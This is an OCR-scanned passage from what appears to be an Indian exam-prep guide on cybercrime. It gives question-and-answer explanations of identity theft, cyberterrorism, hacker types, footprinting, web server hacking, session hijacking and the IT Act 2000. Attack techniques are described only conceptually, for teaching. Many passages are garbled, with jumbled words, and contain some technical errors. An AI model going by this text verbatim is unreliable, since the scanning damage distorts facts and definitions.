(h) Fake Telephone Calls — In this method the caller asks the | 
victim to verify his/her account details immediately otherwise his/her bank | 
account or ATM card will be suspended. This is very effective method of 


make suffici 


collecting information. 

(ii) Computer-based Techniques — In these techniques the attackers 
make an attempt to exploit the vulnerabilities within existing processes and/or 
systems. The computer-based techniques of ID theft are — 

(a) Backup Theft — In this method attackers also strike public | 
facilities like transport areas, hotels, etc. as well as stealing equipment from 
private buildings. The stolen equipments or backups are carefully analyzed by 
them to recover the data. | 

(b) Hacking and Database Theft — The information systems | 
are attempted to compromise with various tools, methods and techniques 0 | 
get unauthorized access by criminals, besides the stealing of equipment. 
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© Phishing — Siege method, the fishers try to get the user to 
ersonal details such as credit card numbers, Passwords, account 
gisolose Pe by covering the user to provide it necessarily. 


info d) Pharming — In this method, the typo or matchi i 
ofthe we are setup by attacker. Here the websites erdee 
game d feel are installed. 
jook 9^ (e) Redirectors — Here the users" network traffic is redirected 
ons they did not intended to visit. The highest volume in traffic occ e 
Jocatio ode that simply modifies the victim’s DNS server sale or 


g malicious c 
A host files to T . i 
28. What is the cyberterrorism ? Discuss in detail. (R.GP y, , Nov. 2018) 
‘Ans. The term cyberterrorism was introduced by Barry collin in 1997, 
ho was a senior research fellow at the institute for security and intelligence 
“california. It is like to be a controversial term. Related to deployment a very 
in 2 definition was chosen by some authors from know terrorist organizations 
wy sruption attacks against information systems for the primary purpose of 
creating alarm and panic. But this narrow definition made it difficult to identity 
any instance of cyberterrorism. Then Kevin G. Coleman of the Technolytics 
institue defined cyberterrorism as — 
“The premeditated use of disruptive activities, or the threat thereof, against 
computers and/or networks, with the intention to cause harm or further social, 
ideological, religious, political or similar objectives or to intimidate any person 


edirect DNS lookups to a fraudlent DNS server. 


in furtherance of such objectives.” 

The term cyberterrorism has two words — cyber which is familiar to most 
of the peoples and terrorism which is less familiar. Since we can understand the 
term cyber but the term terrorism is difficult to define. The ambiguity in the 
definition brings in vagueness in action, as D. Denning pointed in his work 
saying that "An e-mail bomb may be considered as hacktivism by some and 
cyberterrorism by others". Everybody can understand the term cyberterrorism, 
either from the popular media or from the personal experience. The convergence 
of cybernetics and terrorism was defined as cyberterrorism by Barry Collin. 
The special agent for the FBI gave a definition in the same year. 
"Cyberterrorism is the premediated, politically motivated attack against 
information, computer systems, computer programs and data which result in 
violence against noncombatant targets by sub national groups orclandestine agents. 


Q.29. What is virtual crime ? Explain. 
in t mE virtual crime has a part of problem within the word ‘virtual’, 
: ud age "i ecome increasingly lacking of meaning. Sometimes virtual 
Merit z o things that are practically the same in effect as the term 
ihe ometimes it simply refers to representations of things "create? 
or carried on by means of a computer or computer network.” 
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Virtual crimes 

defining hos ad be equated to cybercrimes by a narrower defini, 
the Computer" Mass as crimes committed by means of a computer or e 
virtual crimes. Wa ey multiplayer online Game (MMOG) is an exampj 
say that virtual cri n on y describe the virtual crime by MMOG. So we ù 
which is pla Times are limited to only MMOG. MMOG is a video ^à 
Liter: p yed and accessed by thousands of players with the conditions , e, 
EVA €cess and atleast one permanent virtual world is needed. Ther, hat 
Y forms of MMOG some of them are — © ate 

(i) MMORPG - Massively Multiplayer Online Role-Playing G 

(ii) MMORTS - Massively Multiplayer Online Real Time Aut 
(iii) MMOFPS ~ Massively Multiplayer Online First Person Sho . 
(iv) MMOSG - Massively Multiplayer Online Social Game, ii 

The first multiplayer online game was introduced in 1987s ang it m: 
popular in 1990s. The most recent advancement in the scope of MMog " 
second life in MMOSG. Now the authors of MMOG are calling it “3p in is 
world” instead of “Game”. Second life is a parallel virtual world vn 
inhabitants, who perform their own ideas and needs such as communicat; 
among them, meeting to new friends buying, studying, entertaining themselya 


Can 


in bars or cafes etc. 
Now worldwide known companies like Dell, Adidas, Mazda, Vodafone 


Philips etc. and hundreds of others have joined this virtual world for new 
product testing and for the support of real product sale. So this game is now 
only for fun but for other activities also. 

The connection between real world and virtual world can be established 
on several levels. Few months ago there was a news that the second life has | 
its first millionaire named Anshe Chung who was a avatar created by Ailin | 
Graef and her husband. | 

They earned their first million by virtual real state trading. Although only | 
Linden dollars can be paid in second life. Linden dollars can be purchased and | 
sold for real money (US dollars) in LindenX exchange office or in exchange 


offices of third parties. 
In second life, all rights are assigned to the authors of created world, like | 


creating characters, clothing, scripting, objects and other design. So these | 
possibilities give freedom for fraudlent acts and for infringements of intellectual 
property law. In 2007 six dealers who was offering their goods in second lift 
field an action agaisnt another user for an illegal copy of digital wares. 

In other MMOG types we can find that individuals are abusing the virtual 
environment with the intent to enrich themselves. Other examples like gold 
farming or virtual mugging among the well-known illegal practices can be 


included. 


EN. 
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TON OF CYBER CRIMINALS — HACKERS 
PERCEPT TONTS AND EXTREMIST GROUP ETC., 


vile SERVERS HACKING, SESSION HIJACKING 


Write a short note on hackers. 
ape meaning of the word hacker has been changed over the years 
Mauer technology. In present, there are two opposite meanings of 
with the ch ont in computer enthusiast as an individual who enjoys exploring 
packers: Fire computers and how to stretch their capabilities. Though most of 
Is o he minimum necessary. The second and opposite 


the detal rto learn only t 
e ic ma curious busybody who tries to discover information by poking 
jsa ma 
ground. cople, who were highly knowledgeable about computing, were 
The P as hackers. They were considered computer experts who could 
conside der through programming on computer. 
do pl process of gaining unauthorized access into a computer system for 


ifferent purposes is known as hacking. Hacking has been used as a political 
di € ial demonstration during international crises. 
or 


Q3. Explain different types of hackers. 
Ans. Based on the phenomena of hacking there are several types of hackers. 


Some of them are as follows — 

(i) Crackers — The attacker, who breaks security of a system is 
known as cracker. Crackers are professional security breakers and thieves. 
The term cracker was coined by purist hackers, who wanted to differentiate 
themselves from individuals with criminal motives whose sole purpose is to 
sneak through security systems. Purist hackers were worried that journalists 
were misusing the word hacker. They were worried that mass media has 
failed to differentiate computer enthusiasts and computer criminals. 

Now the crackers are reforming by turning their hacking knowledge into 
legitimate use. They are forming enterprises to work with cyber security 
companies and sometimes law enforcement agencies to find and patch potential 
security breaches before their former counterparts can take advantage of them. 


(ii) Hacktivists — The conscious hackers with a cause are hacktivists. 
They are originated from phreakers. Hacktivists carry out their activism in an 
electronic form in hope of highlighting what they consider noble causes such as 
institutional unethical or criminal actions and political and other causes. Hacktivists 
use several approaches to get the message across like real world. These approaches 
may be automated e-mail bomb, web de-facing, virtual sit-ins etc. 
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(iii) Cyberterrorists — Cyberterrorists can be divided ir 


. NtO ty, 
Categories based on their motives. ° 


. (a) Terrorists — The terrorist who are cyberterrorists have man 
Motives, such as ranging from political, economic, religious, etc, Most Ofte 
the techniques of their terror are through intimidation, coercion, or actual 
destruction of the target. à 

(b) Information Warfare Planners — Attacking a target p 
disrupting the target's essential services by electronically controlling ang 
Manipulating information across computer networks or destroying the 
information infrastructure to threaten the war planners. 


Q.32. What are the different classes of hackers ? Discuss them in brief, 
(R.GP.K,, Dec. 2010, June 2011) 
Or 
Write short note on classes of hacker. 
Or 


Discuss the classes of hackers. 


(R.GP.., Dec. 2013) 


(R.GP.V., Dec. 2016) 

Ans. There are many ways to classify those who break into computer 
systems, depending on which source you are reading. However, most lists of 
the types of hackers include the following — 


(i) Black Hat Hackers — Black hats are the bad guys — the malicious 
hackers or crackers who use their skills for illegal or malicious purposes. 
Black hat hackers are motivated by greed or desire to cause harm. They target 
specific systems, write their own tools, and generally attempt to get in and out 
of a target system without being detected. Because they are very knowledgeable 
and their activities often undetectables black hat hackers are among the most 
dangerous. 

(ii) White Hat Hackers — This group considers itself to be the good 
guys. Although white hat hackers may crack a system, they do not do it for 
personal gain. When they find a vulnerability in a network, they report it to the 
network owner, hardware vendor or software vendor, whichever is appropriate. 
They do not release information about the system vulnerability to the public 
until the vendor has had a chance to develop and release a fix for the ae 
White hat hackers might also be hired by an organization to test a netwo! 
defenses. inp 

White hat hackers are very knowledgeable about pr ey 
programming, and existing vulnerabilities that have been found and fixed. 
typically write their own cracking tools. 


(iii) Grey Hat Hackers — Grey hats are hackers Mem 
offensively or defensively, depending on the situation. This is the 


may work 
ding li? 


ee. ail 
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hacker and cracker. Both are powerful forces on the Internet, and 

between remain permanently. And some individuals qualify for both categories. 

ae of such individuals further clouds the division between these 
The ex! 


pwo groups of people. 
(iv) Suicide Hackers — Hackers in this category perform their 
ivities with little regard for the law or staying undetected. They seek to 
acti mplish their goals at all costs and do not worry if they are caught. Their 
e could include political, terrorist or other aims. 
goi 


0.33. Write short note on footprinting. (R.GP.V., Dec. 2012) 

Ans. Footprinting is the first and most convenient way that hackers use 
to gather information about computer Systems and the companies they belong 
to. The purpose of footprinting to learn as muah as you can about a system, 
it's remote access capabilities, its ports and services, and the aspects of its 
security. 

In order to perform a successful hack on a System, it is best to know as 
much as you can, if not everything, about that System. While there is nary a 
company in the world that is not aware of hackers, most companies are now 
hiring hackers to protect their systems. And since footprinting can be used to 
attack a system, it can also be used to protect it. If you can find anything out 
about a system, the company that owns that system, with the right personnel, 
can find out anything they want about you. 


Footprinting is necessary for one basic reason — it gives you a picture of 
what the hacker sees. And if you know what the hacker sees, you know what 
potentia] Security exposures you have in your environment. And when you 
know what exposures you have, you know how to prevent exploitation. 


ii a are very good at one thing — getting inside your head, and you do 

Wis inis dd S They are systematic and methodical in gathering all pieces 

Medi erae : ated to the technologies used in your environment. Without a 

are likely to es Ed for performing this type of reconnaissance yourself, you 

organizati Ss key pieces of information related to a specific technology or 
ton — but trust me, the hacker won’t. 


Be fo oa 
i rewarned, however, footprinting is often the most arduous task of 


trying to ; : 

most M arie aa the security posture of an entity; and it tends to be the 
or freshly minte i i i 

9n some test hack y d security professionals eager to cut their teeth 


steps and it cking. However, footprinting is one of the most important 
must be performed accurately and in a controlled fashion. 


Q.34, P 
Explain the extremists and insurgents groups. 


A P 
(which a Extremists have 


re i TP 
re not based on doubled their efforts to pursue their objectives 


truth or fact) of creating violence and instability 


y 
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across the w ; 
e world, with terrorists. The year 2014 was worst 


ye 
years, because 93 co year, i 


: A untries were experiencing an att n las 
bin killed Across the world in ee ena a os 22700 Peo 4 
ate of Iraq and Syria) and Al Qaeda were the mai ne i is, 
eee A re the main sources of the E amig 
ps are more than just loose associations of Tadicalise, o 
‘a threats will grow at rapid pace because in some regi 
CE T organizations have sub-contracted their operations to 
criminals and warlords. Hence the vulnerability would be created b 
networks, even where the terror organizations do not have their footy; 
India is facing with multiple threats from religious and ala. 
Secessionist and saparatists organizations. The threat is from Islamic à 
Orig 


ONs/couy hi 


[: 
Mercen, i : 
j 


left wing extremists (LWE), secessionist organization from the North ts, 


and now even from communal forces. The challenges before S 


is to protect the citizenship of country by preventing and den 


society, denying their access to funds, weapons and safe havens, stripi 
lerrorists from their roots and prevent networking between insurgent, Ng the 
and various terror organizations. Eus 
In cyber terminology the insurgency is defined as “An organized movemen 
aimed at the disruption of cyber systems and through subversion and armed 
cyber conflict”. d 

There may be different goals of cyber insurgency but the following 
conditions are necessary — 

f (i) Common entity or authority against whom, actions are directed, 
is must. 

(ii) The tools of cyber insurrections and the systems to launch attacks 
against the entities are needed. 

(iii) Cyber forces may be used by the cyber insurgents, against their 
targets. 

The cyber security professionals learn from the records of irregular or 
low intensity warfare to better understand how to fight against this thread 
This means that how can we modernize our strategies of cyber security. 

The Internet has become a tool for radicalisation, recruitment, 
communication and training for terrorists and extremists. As a medium the 
decentralised nature of the Internet has made it difficult to governments to 
respond to threats emerging from it all over the world. 

The terrorist groups are using social media as a way to violence. It's 
used for operations, ideation, indoctrination and recruitment. It targets peopl 
to inspire them to take action individually, making it hard for states to identity 


and track them. 


ey 
d fighter, * | 


Arie. 
Y Such glob, | 
Bical | 


the 80Vernmen, | 


^ : à Jn Ying recru ; 
of the youth into terror/insurgent organizations, keeping terrorists Ege. | 
OF the | 


Unit- Il 45 


u mean by hacking of web servers ? 
0. 


is related to hardware and software so there 


4s what do Y 
web servers. In hardware context — a web 


" the ter! 

, since ac 

Ans eanings as h 
m n w 


m server 


e and documents using the HTTP over the world wide web. 
gs WEP pages the Internet containing website must have a web server 
such computer im is used to provide various types of services, such as 
am. web SE nails, downloading requests for a file and even more. 
"t and receiving hances of web server hacking. Web server 


i re great C ; 
that completely relies on HTTP traffic to attack and 


for defacement of websites. 
ethods to hack web servers — 


bs 
i) Types of we 
a Web server defacement 
iii) IIS exploits. . 
io Web server protection checklist. 
Th rao given above can be used to hack a web server as follows — 
e 


(i) Types of Web Server Vulnerabilities — A web server can be hacked 
by finding vulnerabilities in it. There are few common vulnerabilities discuss 
y 1i 


pogs (a) Misconfiguration — Generally Microsoft’s IIS acts as a 
web server to use the default website. The persons who are using default 
website can access all the files in the default website folder. Similarly the users 


have permissions to execute full control of the file. Consequently, the default 


website is open to attack. 

(b) Bugs — These includes operating system bugs, application 
bugs, or flows in the programming code. 

(c) Default Installation — The default setting of a web browser 
software or operating system should be updated on a regular basis always and 
must not be left as default. 


(ii) Web Server Defacement — A web server defacement or a website 
defacement means that a hacker attacks on a website and changes the visual 
ippearance of website. Mainly web server listens to port 80 (HTTP) and port 
443 (TCP). Therefore these port needs to be open for passing traffic between 
the web server and the client. 


(iii) HS Exploits — Windows IIS is one of the popular web server 


rod 
oducts. Therefore, web Servers that run IIS, have more probability to be 
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" The root directory stores the home 
uments for the webserver, A roof dire 


page of a Website, index or 
Sub-directories Store other types of fi 


ctory includes Subdirectorieg Üe 
le such as a Scripting file, = 8e 
(b) Source Disclosure — This type of attac 
code of application running on a web server and with 
Code, a hacker identifies the histo 
type, programming language, 


k accesses th 

E $0j 
l with the help of this ot 
ry of the application such as appli ure 
and much more information, Pali 

(c) Buffer Overflow — In this attack a large amount 

large amount of data is sent to a web server. Therefore the E 
Capacity to handle the data. In such cases the web server is unable 
the data. So buffer overflow takes place. 


data | 
er Needs | 
to handle 


(iv) Webserver Protection Checklist — When We need to pr | 
our web server, we can use web server protection checklist. This cl M 


; , A hecklis | 
contain some parameters by using which hackers can attack on the ir 
server. web 


Q.36. What do you mean by session hijacking ? (R.GP. V, Nov. 2019 

Ans. Session layer protocols maintain state through a session identifier | 
and the identifiers are usually valid for an extended period. If the session 
identifier is not encoded, then an attacker may acquire the session identifier 
and hijack the session. This is a common style of network attack, and referrei 
to as session hijacking. 

Web cookies readily lend themselves to session hijacking. Many 
computer viruses, like Sasser and Berbew, harvest Web cookies from 
infected hosts. These cookies store active session information, allowing | 
an attacker to effectively hijack a session. For example, some variants of | 
Agobot looked for Web cookies associated which Bank of America and 
sent them to a remote system managed by the attacker. Using the stolen 


| 
cookie, the attacker could access the Bank of America account without | 
needing login credentials. | 


To mitigate attacks from stolen sessions, cookies should be disabled or 
removed when the browser closes. Cookies may be cryptographically linked 


to a specific network address. Since network addresses are difficult to forge | 
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rk, hijacking becomes much more difficult. 
two re Web cookies with specific lifetimes; after 
web servers con een valid. These servers can protect their 
e cookie 1$ no th short lifetimes. Unless the cookie is 


- ning cookies Wi l : k 
signing ired session has little value to an attacker. 
by ass diately, the expire 

mediate? 


f these mitigation steps. Each ticket hasa limited 
ses many : ires, the client “renews” the ticket by requesting 
ore the ae tickets are associated with client-specific 
: jon e session key, etc.) and are cryptographically 

jon (client c° ttacker can get past the encryption and impersonate 
udo duration restricts the window of opportunity for 


- the local n 


mers 


custo used IT? 


ssum! 


does session hijacking work ? | 
pre the http communication uses many TCP connections 
i eds a method to recognize every user's connections. 
d is authentication process and then the server sends a 
lient browser. This token is composed of a set of variable width 
token to the clie d in different ways, like in the URL, in the header of http 
and it could be use kie, in other part of the header of the http request or in the 
ion as i uisition. The attack compromises the session token by 
; - oiling a valid session token to gain unauthorized access to the 
e The compromisation ofa session token can be occurred in different 
we : 


ways, two of them are as follows — 


most usel 


requisiti 
body of 


(i) Session Sniffing — We know that, there is a string called tokens, is 
the session id of a valid session. The attackers firstly try to find this session id. 
The attackers uses a sniffer to get this session id. When the session id is captured, 
the attacker uses this session id to gain unauthorized access to the web server. 


(ii) The Cross-site Script Attack — The way, to get the session id 
with the help of running a malicious code or script from the client side, is 
cross-site script attack. In this attack, the malicious script also known as 
malicious payloads are executed into a legitimate website or web application 
by the attacker. In this attack the victim is not targetted directly by the attacker, 
but the attacker could exploit a vulnerability in a website that the victim would 
visit and use the website to deliver malicious script to the victim’s browser. 


0.38. How can we prevent session hijacking ? 


Ans. As we know that the session id is stolen by installing a malicious 
o on the client website and then the cookies are stolen. The best approach 
© prevent session hijacking, is that the protection should be enabled from the 


client si à ; Mean Quippe 
"ent side. Taking preventive measures on the client side for session hijacking 


> 


m 
7 
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is highly recommended. The users should have efficient antivirus, anti-malway, 
softwares and should keep the softwares up-to-date. e 
There is a technique that uses engines which fingerprints all requests of 
session. Beside the tracking IP address and SSL session id, the engines ien 
track the http headers. Each change in the header adds penalty points to the 
session and the session gets terminated as soon as the points exceeds a ites 
limit. This limit can be configured. This is effective because when titres 
occurs. It will have a different http header order. ý 
These are the recommended preventive measures to be taken from both 
the client and server sides, in order to prevent the session hijacking attack 


3 
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m CYBERCRIME AND CRIMINAL JUSTICE — CONCEPT OF 

` CYBERCRIME AND THE IT ACT 2000, HACKING, TEENAGE 

"WEB VANDALS, CYBER FRAUD AND CHEATING, 
DEFAMATION, HARASSMENT AND E-MAIL ABUSE 


Q.1. Define the concept of cybercrime and the Indian IT act 2000. 


Ans. After the United Nation General Assembly Resolution A/RES/5]/ 
162 IT Act 2000 was enacted by taking the Model Law on Electronic Commerce 
taken by the United Nations Commission on International Trade Law. 


The term cybercrime is not defined in the Indian IT Act 2000. Generally 
there are two definitions of cybercrime. In first definition it can be defined that 
“cybercrime contains only those crimes which are included in IT Act 2000”, 
This definition is only limited to tampering with computer source code, hacking 
and cyber pornography. Other cyber related crime such as cyberdefamation, 
e-mail spoofing, cyberfraud etc. would not be treated as cybercrime, 

The second definition can be given as — 
omitted, with the help of or through or conne 
by law and if the punishment for which by pe 
then it will be called cybercrime”. 


This definition is also not covering all the crimes in the Indian IT Act 


2000. For example — A person is threatening the other on Internet and he commit 
Sucide th 


en that person will be charged the offence of criminal intimidation 
under section 506 of IPC, 1860. He will not be charged under Indian IT Act 
2000, Since, there are few cybercrimes which are included in IT Act 2000 and 
ere are many crimes other than crimes included in IT Act 2000, in cyberspace 
| Which are given in IPC 1860. 


| The Indian IT Act was ena 
2000 was to 
Act 18 


“A crime which is committed or 
cted with Internet, and prohibited 
nalties or imprisonment is provided 


cted in 2000. The purpose of Indian IT Act 
make changes in the Indian Penal Code (IPC), the Indian Evidence 
72. The Banker’s Books Evidence Act 1891, the Reserve Bank of India 
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Act 1934. The section 58B about penalties was included j 

of India Act. Some important changes in the IT Act 2000 . the Rese is 

accommodate the current cybercrime scenario. Were introdu, Pi 
d ty 


Q.2. What is IT Act 2000 ? Write the silent features of IT 
A 


ct 
(R.GP.y,, v, 2000, 
2 2014) 


Ans. IT Act 2000 — Refer to Q.1. 


Features of IT Act 2000 — Features of Indian IT Act 2000 
(i) An e-mail was not accepted under the Prevailing "ed 8 
as an accepted legal form of communication and as evidence j atutes of Ing 

IT Act 2000 change this scenario by legal recognition of the ci Of |a a | 

(ii) The ITA 2000 has provided legal infrastructure for mig form . 
corporate sector to carry out e-commerce transactions. Companies in | 
(iii) The concept of digital signature is provided 
4 . . f | 
carry out their transactions online. The digital signatures are le: si Porates to | 
sanctioned under the ITA 2000. Bally valid ang 
(iv) Now, the companies are storing the information on thei 
computer system, apart from maintaining a backup. It became os Dti 
corporate to have a statutory remedy if anyone breaks into Hehe Pis 
systems and causes damages or copies data, under ITA 2000 Thr lr 
provided by the ITA 2000 is in the form of monetary damages b "ud ie, 
compensation, upto € 10,000,000. NN UBH of 
(v) Various cybercrimes were defined in ITA 2000. 
. Bef 
cyberlaw came into the effect, the corporate were helpless as there xi a 
legal redress for such issues. TM 
Q.3. What are the limitations of IT Act 2000 ? 
Ans. The limitations of IT Act 2000 are as follows — 

(i) The issues related to domain names are not included in ITA 2000. 
Since e-commerce is based on system of domains and domain names have not 
been defined in the IT Act 2000. The rights and liabilities of domain name 
holders are not included in the law. 

. (ii) The issues concerning the protection of Intellectual Property 
Rights (IPR) in the context of the online environment, are not dealt in ITA 
2000. The issues related to online copyrights, trademarks and patents etc. are 
not covered in this law. 

(iii) There are many new forms and manifestations of cybercrimes as 
far as the cyberlaws are getting developed. The offenses defined in the ITA 
2000 are by no means exhaustive. It does not cover various types of cybercrimes 
such as Internet Time Theft, cyberdefamation, cyberfraud, cyberharassment, 
misuse of credit card, cyberstalking etc. 


as fol] 


Bn. — un 


Unit - Ill. 51 


TA 2000 has not tackled vital issues pertaining to 

ke privacy and content regulation to name a few. 

cability of IT Act to negotiable instruments is avoided 
Act is not explicit about regulation of electronic payments. The 

he !* t over the regulation of electronic payments gateway and 

ct stays em negotiable instruments from the applicability of IT Act. 
=a ajor effect on the growth of e-commerce. 

a 


The ! 


ge here li 


merce s í 
om! a The appli 


trust issues are not included in the IT Act. 


(vi) The anti . 
;) The IT Act 2000 does not lay down parameters for its 
(un so this is the most serious concern related to the Indian 
Also when Internet penetration in India is extremely low and 
cyberlaws- d police officials are not very computer savvy, the new Indian 
overnment An more questions than it answers. 
igi There may be a conflict of jurisdiction and IT Act 2000. 
4. What is the need of cyberlaw in India ? 
: rk that is created to give legal recognition to all risks 
t of the usage of computers, computer systems, or computer networks. 
any aspects such as data protection and privacy, freedom of 
d crimes committed using computers comes under the cyberlaw. 
law passed by Indian Parliament was the IT Act 2000, of which 
de legal infrastructure for E-commerce in India. The ITA 
2000 was approved by the President of India and now it has become the law of 
the land in India. To regulated Internet-based computer-related transactions in 
India, the Government of India felt the need to pass a relevant cyberlaw. It was 
mentioned that the ITA 2000 was an Act to provide legal recognition for 
transactions carried out by means of electronic data interchange and other 
means of electronic communication, referred to as e-commerce, while it was 


This m 


a A framewo 
arising oul 
There are m 
expression an 
The first cyber! 
aim was to provi 


introduced. 
The reasons to pass the IT Act 2000 in India are as follows — 


(i) Although all possible situations and cases that have occurred or 
might take place in future are covered in a very well-defined legal system in 
India, when it comes to newly developed Internet technology the country lacks 
in many aspects. Because of this increasing use of Internet it was necessary to 
fill this gap with suitable law. 

(ii) Since Internet is most dominating source of carrying out business 
today, therefore, there was a need to have some legal recognition to the Internet. 
ú (iii) A new concept called cyberterrorism came into the effect, with 

© growth of the Internet. Cyberterrorism includes the use of disruptive 


v 
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activities with the intention to further social, ideological, religious elc 


Objectives in the world of cyberspace. It was about committing Si M Simip, 
but in an innovative way. feng, 


Considering all these factors, the Information Technology Bill wa 


on 17 May 2000 by Indian Parliament. It was called IT Act 2000. Passeg 


Q.5. Why we need cyber security explain ? 


Ans. lts being protected by internet-connected system, 
hardware, software and data, from cyber attacks. Ina computin 
security comprises cyber security and physical security both is Cont, 
enterprises to safe against unauthorized access to data centre au b 
computerized systems. The security, which is designed to ti Othe, 


: : men > inta; 
confidentiality, integrity and availability of data, is a subset ia the 
CYbey 


Mclain 


security. 

The range of operations of cyber security involves Protecting info, 
and systems from major cyber threats. These threats take many fo; 
result, keeping pace with cyber security strategy and operations 
challenge, particularly in government and enterprise networks wher 
most innovative form, cyber threats often take aim at secret, politi 
military assets of a nation, or its people. Some of the common threat 


TMation 
tms, As a 
Can bea 
in thei, 
cal and 
S are ag 


follows — 

Cyber Terrorism — It is the innovative use of information technology h 
terrorist groups to further their political agenda. It took the form of attacks E 
networks, computer systems and telecommunication infrastructures, 


Cyber Warfare — It involves nation-states using information technology 
to go through something another nation’s networks to cause damage. In th 
U.S. and many other people live in a society, cyber warfare has been 
acknowledged as the fifth domain of warfare. Cyber warfare attacks are 
primarily executed by hackers who are well-trained in use of benefit the quality 
of details computer networks, and operate under the favourable and support of 
nation-states. Rather than closing a target’s key networks, a cyber-warfare attack 
may forced to put into a situation into networks to compromise valuable data, 
degrade communications, impair such infrastructural services as transportation 


and medical services, or interrupt commerce. 


Cyber Spionage — It is the practice of using information technology to 
obtain secret information without permission from its owners or holders. Itis 
the most often used to gain strategic, economic, military advantage, and i 
conducted using cracking techniques and malware. 
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(R.GP.V., Dec. 2015) 


Q 6. Or 


yite short note 
The term ha 


on hacking. (R.GP., June 2012) 


cking used to mean expert writing and modification of 

ams. Hackers were considered people who were highly 
r gn ut computing. They were considered computer experts who 
cable a copie do all the wonders through programming. Today, 
e the col efers to a process of gaining unauthorized access into a 
B" a variety of purposes including stealing of and altering of 
c demonstrations. For some time now, hacking as a political 
has been used during international crises. During a 


criod, hacking 


f sentiments over the crisis. 
te on hacking tools. (R.GP.V., Dec. 2003, 2011) 


Q^ Write short no ; 
several tools to gain access to secure systems. Some 


Ans. Attackers use 


of those tools are — 
() Password Guessing — Because access to most programs depends 


rd authentication protocol (PAP) there would-be attacker attempts 
ae user name and password. User name is usually simple because it 
so used as an e-mail ID. The determination of the password is a 
Fig. 3.1 shows the PAP process. 


on pai 
to guess b 
often is al 
calculated guess. 


Request for User ID 


| 


Request for Password 


Password 


Log-in Based on 
User Database Check 


| 


Fig. 3.1 Password Authentication Protocol 
Therefore passwords must be designed and controlled to make their 
guessing a very complex proposition. 
(ii) External Programs — Several remote programs are used to 


attempt to capture and control the operation of a computer and access, read, 
manipulate, or delete data. Table 3.1 lists a few examples with a definition of 


their legitimate purpose. 


lin. di 
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Table 3.1 External Programs 


Network management 
software 

Port mappers 
Database replication 
services 


(üi) Malicious Programs — Fig. 3.2 shows an overall taxonom 
software threats, or malicious programs. These threats can be divided Sed. 
categories — those that need a host program, and those that are independen, 
The former are essentially fragments of programs that cannot exist 
independently of some actual application program, utility, or system program 
The latter are self-contained programs that can be scheduled and run by the 


operating system. 
Malicious 
Programs 


A virtual terminal program that permits a 
device to attach itself to a local compute 
form ofa terminal and is used by systems 
to update and manipulate files. 


remon 
T in the 
People 


Tools designed to access remote systems resou, 
for management purposes. 


Used by administrators to determine users 
processes operating certain shared systems "9 


ICes 


Software tools used to transfer record updates 
server databases fo 


Trap Doors 


Replicate 
Fig 3.2 Taxonomy of Malicious Programs 


Q.8. What do you mean by the term Teenage Web Vandals ? 


Ans. Security experts also call the Teenage Web Vandals as — Packet 
Monkeys, Script Kiddies and Ankle-Biters. These are the teenage gangs, who 
love to play real games in virtual world. Various opportunities, which were 
unimaginable before, were thrown in 1990s by the Internet and information 
technology. 


Some examples of billionaires and super achievers are — Sabir Bhatia 
(founder of Hotmail), Jerry Yang (founder of Yahoo), Marc Anderson (founder 
of Netscape) etc., who became billionaires below the age of 35 years. But now 


to become billionaire and fame nobody have to wait till 35 years, because of 
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aad attraction of IT. But this attraction is also giving birth to teenage 
wer 


io riminals. 
gither web pages are defaced or remarks are tagged on websites by most 


enago web vandals. Now the cybercrime has become fashionable 

D uU vourite of netizens in India. 
and fa sathe web defacement and tagging of websites are harmless or may be 
vien but there is a fear creating in the Internet community, this fear has 
dn cost of security, and there many doubts about future of e-commerce. 
io^ motivating factors and causes of teenage web vandals are as follows- 


(i) They want to be famous and publicity all over the world using 


po 


ternet- ; 
In ái) Excitement of achievement and greatness by doing something 


different. 
Gii) There is no fear of the law and its enforcement due to anonymity 
p rovided by the system of the Internet. 

(iv) They do not know the bad effects of the act of defacing or hacking. 
They think that, there is no loss caused by their acts. 

(v) By doing this, they are claiming that they have a good knowledge 
of computer programming and Internet. 

(vi) The knowledge, which is not in right direction of Internet and 
computer programming. 

(vii) The resources are cheapest and easily available to commit 
hacking and defacement of websites. 


Q.9. Discuss the term cyber fraud and cheating. 

Ans. The frauds which are constituted on the Internet are known as cyber 
fraud. About one-third of all cybercrimes is constituted in cyber frauds. Cyber 
frauds are increasing day by day. Cyber frauds are increasing with the growth 
of e-commerce because it's profitability is in unleashing the e-commerce. 
Victims of cyber fraud do not disclose the case because of fear of loss of 
public trust, image, business etc. Some cases of cyber frauds and cheating 
include misuse of credit cards by hacking the password, bogus investment 
illegal transferring the funds etc. 

The term is not included in the IT Act 2000, so we will have to follow 
other laws of Indian Penal Code 1860, or Indian Contract Act 1872 etc. T he 
acts given below are the meaning of fraud. 

(i) The suggestion which is not true. 
(ii) Promising somebody and intention of his/her is not to fulfil it. 
(iii) The omissions or acts which are declared by the law are fraudulent. 
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___ In the law of contract this definition of fraud is applied to Contract 
civil relations between parties and has no applicability to crimina] law io Or 
for the purpose of criminal law, the term cyber fraud would be a improper 
appropriate and instead of this the term cyber cheating would be oi 
appropriate in India. The term cyber fraud in India can be used for m 


7 Only a; .. 
laws and law of contract, for claiming damages and compensation, Y civil | 


For the acts of cyber cheating not only the punishment under the 
law but also the compensations for damages under civil laws are į 
There is no definition or offence of fraud in the Indian Penal Code (IPC zu 
even many other contents which contain the ingredient of fraudlent action, 
are there. hd 


| 
Crimina | 
Dcludeq 


The ingredients of cheating are as follows — 


(i) When a person make a false representation and to Which 


] he/ 
knows that it is false, is known as cheating. She 


(ii) Deceiving a person by making a false representation wit 


: h hi 
her, with the intention of dishonestly, is known as cheating. d 


(iii) The deceived person is induced to deliver any Property or to do 
or omit to do something. 


The punishment for cheating a person/firm is imprisonment whic! 


h ma 
be extended to one year or fine or both. : 


Q.10. Describe various offences of fraud and cheating in the Indian 
Penal Code which are similar to cyberfraud. 


Ans. There are some provisions in the Indian Penal code which are similar 


to cyberfraud. These offences with IPC section and punishment are given in 
table 3.2. 


Table 3.2 


Offence/Provision 


Punishment 


Dishonest misappro- 
priation of property. 


Imprisonment for a term which 
may be extended to two years 
or with fine or both. 
Imprisonment for a term which 
may be extended to three years, 
or with fine or both. 
Imprisonment for a term which 
may be extended to seven years 
and fine. 


(ii) | 405, 406 | Criminal breach of trust. 


Criminal breach of trust 
by clerk or servant. 


() 


(vi) 


(vii) 


(xii) 


(xiii) 


(xiv) 


(xv) 


pp 


409 


463/465 


464 


466 


468 


469 
470 


471 


476 


477 


477A 


481 
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Criminal breach of trust |Imprisonment for life, or with 
by a public servant or  |imprisonment for a term which 
by a banker, merchant, |may be extended to ten years 
factor, broker, attorney and fine. 

or agent. 
